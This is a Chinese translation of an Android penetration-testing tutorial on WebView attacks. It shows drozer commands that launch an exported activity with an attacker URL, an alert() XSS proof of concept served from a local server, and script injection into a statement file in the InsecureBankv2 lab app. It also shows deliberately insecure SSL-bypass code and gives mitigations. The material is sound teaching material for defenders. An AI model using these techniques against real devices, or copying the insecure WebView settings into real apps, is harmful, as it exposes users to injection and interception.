Android渗透:WebView攻击

  • A+

0x00 简介

远古时期,大家只用HTML显示Web页面。后来有了JavaScript,再后来又迎来了动态页面。于是乎,渐渐有一部分人认为在android应用中开放动态页面是个好想法,因此,WebView走进了大家的视野。但是正如安全人员毕生所得的经验那样,没有哪个新技术不是带着威胁降临的。本文就将讨论WebViews它们在Java中的实现、漏洞及其利用方式。在一个android应用中,WebView的错误配置会导致致命的web攻击,并且它的影响是无与伦比的。

0x01 概要

1.什么是WebView?

2.WebView实现产生的漏洞

3.漏洞示例

4.漏洞利用和防御措施

5.结论

0x02 什么是WebView?

WebView是一种视图,可显示现有android应用程序中的网页,而无需在外部浏览器中打开链接。android文件中有WebView的各种应用。例如:

  • 广告

  • 在本机app中呈现网页的博客类应用

  • 某些网页形式的购物app

  • 完成对网站的API身份验证

  • 银行app通常使用WebView呈现报表

在本文的示例攻击场景中,我们将看到WebView如何呈现银行帐单以及如何对其进行攻击。

0x03 基于WebView的漏洞

示例是动态的,但总的来说,由于WebView的配置不当,可能存在以下漏洞

  • 明文凭证嗅探

  • SSL错误处理不当

开发人员通常会忽略SSL错误。 这意味着该app容易受到MiTM攻击。例如下面的代码:

@Override
public void onReceivedSslError(WebView view, SslErrorHandler handler,
SslError error)
{
handler.proceed();
}

  • XSS——如果setJavaScriptEnabled()设置为true

  • RCE

  • API攻击

  • 注入——如果WebView可以访问内容提供者(即app允许setAllowContent访问)

  • 内部文件访问——如果setAllowUniversalAccessFromFileURLs设置为true

0x04 WebView如何实现

自从本系列(指作者写的android渗透系列文章)开始以来,我只谈论Java中的本机应用程序,因此WebView的实现将仅限于Java以及如何调整Android Studio Project文件。

Step 1:在项目中导入android.webkit.WebViewandroid.webkit.WebSettings,同时在活动文件中输入下面的代码:

webSettings.setJavaScriptEnabled(true);

这样做的目的是为了确保在调用WebView时javascript能成功运行,或者页面看上去不会像在普通浏览器上那样华而不实。

Step 2:然后,为了在app中实现WebView,我们需要在someActivity.java文件中添加如下代码:

WebView var = (WebView) findViewbyId(R.id.webview);

Step 3:接着,我们可以用loadUrl方法加载一个URL:

browser.loadUrl("https://hackingarticles.in");

Step 4:然后,我们需要在XML配置文件中定义这个view:

<WebView  xmlns:android="http://schemas.android.com/apk/res/android"
   android:id="@+id/webview"
   android:layout\_width="fill\_parent"
   android:layout\_height="fill\_parent"
/>

Step 5:最后,我们需要在声明文件中给它访问网络的权限:

<uses-permission android:name=”android.permission.INTERNET” />

现在需要注意的一个有趣的事情是如何使WebViews交互——在Step1中的代码中启用了Javascript。尽管这使Webviews能够正常运行,但随之而来的就可能是各种Web漏洞,例如Android中的XSS。

0x05 利用WebViews构造XSS

众所周知,HTML页面可以是远程的,也可以存储在内部存储器中。因此,WebViews既可以调用远程URL,也可以调用内部HTML页面。WebView实现中必须存在以下代码,应用程序才能启动远程和本地HTML页面:
1.外部URL访问:在声明文件中允许访问网络的权限。对于动态页面,SetJavaScriptEnabled()也应为true。

2.内部文件访问:setAllowFileAccess()可以切换为允许。如果声明文件具有读取外部存储器的权限,则它也可以轻松访问SD卡中存储的自定义HTML页面,所以这也是为什么如果不将setAllowFileAccess()设置为允许通常被视为危险的原因之一。

在这里,我编写了一个非常简单的android应用程序,该应用程序使用WebView通过单击按钮时触发的Intent来呈现黑客文章网站。你可以下载这个应用程序

1.png

当单击该按钮时,您可以看到hackingarticles.in会呈现在WebView客户端上

2.png

现在,我们需要启动drozer代理并检查导出的Activity。要注意的是,如果Activity没被导出,则不能用Intent来调用它。

:在这里,我们使用drozer来模拟一个具有代码的应用程序,该应用程序将使用Intent借助一个伪造的URL调用此Activity,从而利用该漏洞。

adb forward tcp:31415 tcp:31415
drozer console connect
run app.package.attacksurface com.example.webviewexample
run app.activity.info -a com.example.webviewexample

3.png

现在,我们可以看到正在导出WebViewActivity。然后我们反编译并查看源代码在activity之后运行,以便我们可以进行利用。

在MainActivity中,我们可以看到该按钮正在调用Intent。分解来看:

1.Intent intent = new Intent(Source Class, Destination Class); //源使用这样的intents调用目标类
2.intent.putExtra(KEY, VALUE); //这是在调用Intent时将传递到目标类的额外参数
注:键是值的引用变量(也就是我们刚刚输入的额外参数的名称),在这种情况下为“url1”,而url是包含“https://hackingarticles.in”的字符串
3.startActivity(intent)将调用目标类并开始Activity

4.png

我们看一下WebViewActivity并分解来看:

1.String url = getIntent().getStringExtra(“url1”); //这会将额外的参数(此处为url1)保存到新的字符串url中
2.setJavaScriptEnabled(true); //这将允许WebViews在我们的WebView中运行javascript。通常用于提供网站的全部功能,但可以被利用。
3.loadUrl(url); //此函数用于在WebView中加载URL。

5.png

现在,在这里的Drozer文章中,我们学习了如何构造包含extras的调用Intent的查询。因此,要借助drozer来利用WebView,我们输入以下命令:

run app.activity.start --component com.example.webviewexample com.example.webviewexample.WebViewActivity --extra string url1 https://google.com

该查询的作用是在调用WebViewActivity来启动我们提供的网站时,它会更改url1 KEY的初始值。

6.png

现在,攻击者所在的地方是钓鱼网站页面或其中包含一些恶意javascript代码的页面?例如,我在exploit.html中设置了一个简单的JS PoC,并将其托管在我的python服务器上。根据移动OWASP Top 10 2014(M7客户端注入),这可作为所有客户端注入攻击的PoC。

Exploit.html
<script>alert("hacking articles!")</script>
python3 -m http.server 80

7.png

剩下要做的就是将此HTML页面包含在我们刚刚进行的drozer查询中。

run app.activity.start --component com.example.webviewexample com.example.webviewexample.WebViewActivity --extra string url1 http://192.168.1.107/exploit.html

如图,我们利用了存在漏洞的WebView来执行XSS攻击!

8.png

缓解措施和最佳做法:在实践中可以针对以下缓解措施的思想编写代码,以实现安全的WebView:

1.验证正在WebView中加载的URLs

2.正确处理SSL/TLS错误,否则可能导致MiTM攻击

3.重写shouldOverrideUrlLoading方法

4.非必要情况,请禁用Javascript

5.避免使用JavaScriptInterface函数,因为它允许JS将Java对象注入代码中,攻击者可以使用WebViews加以利用。

0x06 使用XSS在WebView中访问内部文件

通常,一个文件在内部文件系统中被创建和销毁,并且其输出在WebView中呈现。这些应用程序对内存具有读/写访问权限,因此,攻击者可以诱导应用程序从该应用程序正在创建/使用的文件之一的位置执行其自定义代码。如果我们将javascript代码注入这些文件之一会发生什么?在这里,我们将使用由Dinesh Shetty创建的名为InsecureBankv2的应用程序(位于此处)。设置完应用程序后,您将看到如下页面:

9.png

确保AndroLabServer正在运行(首先安装依赖项,然后运行python app.py)。默认凭据是dinesh/[email protected]$

登录后,您会看到三个选项。首先,我将使用第一个选项转移一些资金。在这里,我将输入两个帐号和金额,仅此而已。在这之后,我将点击第二个选项View Statement。

10.png

单击“View Statement”选项后,我们看到正在打开的WebView显示如下内容:

11.png

在继续进行任何操作之前,我们首先将检查日志。它们展现了诸如Activity之类的东西,也许我们甚至可以看到帐号,资金或凭证,或其他一些有价值的信息!因此,我们输入以下命令:

adb logcat

弹出一些有趣的东西

12.png

在这里,我们看到一个名为ViewStatement的Activity正在从HTML文件中获取输入

存放在外部存储/storage/emulated/0下的Statements_dinesh.html

adb shell
cd storage/emulated/0 && ls

13.png

利用:因此,有可能的是,如果攻击者在受害设备中安装了对存储具有读/写访问权限的应用程序,则他可以更改HTML代码,可能在其中插入恶意代码,并在合法用户单击View Statement后立即执行。

让我们尝试如下调整Statements_dinesh.html:

adb shell
cd storage/emulated/0
echo "<html><body><script>alert("Hacking Articles!”)</script></body></html>" > Statements\_dinesh.html

14.png

我们单击View Statement,然后观察

15.png

如您所见,我们的自定义代码正在运行。但是如何?检查以下代码后,我们发现loadUrl()函数的实现不安全,该函数正在使用file://解析器访问内部文件。

更糟糕的是,JavaScript也已启用。

16.png

缓解措施:通常不建议通过file://URL加载内容。

setAllowFileAccess(boolean)可用于打开和关闭WebView对存储的访问。请注意,资产仍可以使用file://加载(如上),但是高度不安全。要解决此问题,请始终使用androidx.webkit.WebViewAssetLoader通过http(s)代替file://URL访问包含资产和资源的文件。

另外:Android中有一些称为CORS(Cross-Origin Resource Sharing,跨资源共享)的东西。基本上,它可以将android中的CORS配置为允许WebView访问不同的文件。例如,可以使用setAllowFileAccessFromFileURLs()方法通过URL调用file://。但这是不安全的,因为可以在file://中调用恶意脚本。如果您打开可能由外部来源创建或更改的文件,请不要启用此设置。

0x07 结论

这些攻击是在Android app中由于不安全使用名为WebView的类产生的Web攻击,该类使android应用程序可以使用嵌入式浏览器。通常配置不当可能会导致许多像移动应用程序中2017年OWASP Top 10和2016年OWASP Top 10的攻击,而且由于它具有高度动态性,因此它比任何其他的漏洞影响都更大。某些不适当的WebView配置甚至可能导致攻击者获取受害者设备上session。

==本文译自:https://www.hackingarticles.in/android-penetration-testing-webview-attacks/
原作者:Harshit Rajpal
致敬所有对本文创作有贡献的人==